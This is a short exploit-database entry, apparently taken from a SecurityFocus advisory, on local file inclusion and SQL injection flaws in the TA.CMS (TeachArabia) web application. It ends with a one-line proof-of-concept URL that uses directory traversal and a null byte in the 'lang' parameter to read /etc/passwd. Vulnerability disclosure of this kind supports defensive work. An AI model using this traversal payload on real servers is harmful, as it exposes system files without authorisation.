TA.CMS (TeachArabia) - lang Traversal Local File Inclusion

2011-11-22T00:00:00
ID EXPLOITPACK:66C26F7EA622E6AECAC32608D7E0C58C
Type exploitpack
Reporter CoBRa_21
Modified 2011-11-22T00:00:00

Description

TA.CMS (TeachArabia) - lang Traversal Local File Inclusion

                                        
                                            source: https://www.securityfocus.com/bid/50773/info
 
TA.CMS is prone to multiple local file-include and SQL-injection vulnerabilities.
 
An attacker can exploit these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and view and execute arbitrary local files within the context of the webserver.
 
http://www.example.com/?lang=../../../../../../../../../../../../../../../etc/passwd%00.png&p_id=60